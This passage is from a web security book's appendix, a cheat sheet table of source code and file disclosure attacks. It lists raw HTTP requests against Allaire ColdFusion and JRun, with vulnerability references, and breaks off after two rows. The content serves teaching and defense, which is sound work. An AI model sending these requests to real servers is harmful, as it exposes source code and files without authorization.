
Web Hacking: Attacks and Defense by Shreeraj Shah, Saumil Shah, Stuart McClure


Appendix D. Source Code, File, and Directory Disclosure Cheat Sheet

This appendix lists all the major source code disclosure techniques discovered over the years. Many of them are specific to particular bugs in particular versions of software. Others are generic across platforms and have been known to reappear, contrary to what the vendors say.

Table D-1. Source Code, File, and Directory Disclosure Cheat Sheet

| Vulnerable Application | HTTP Request | Vulnerability Information |
| --- | --- | --- |
| Allaire ColdFusion | GET /CFDOCS/snippets/viewexample.cfm?viewexample.cfm Tagname=<relative path to CFM file> HTTP/1.0 | http://www.securityfocus.com/bid/115 |
| Allaire JRun Alternative Data Stream | GET /file.jsp::$DATA HTTP/1.0 | http://www.securityfocus.com/bid/3664 |
Allaire ...
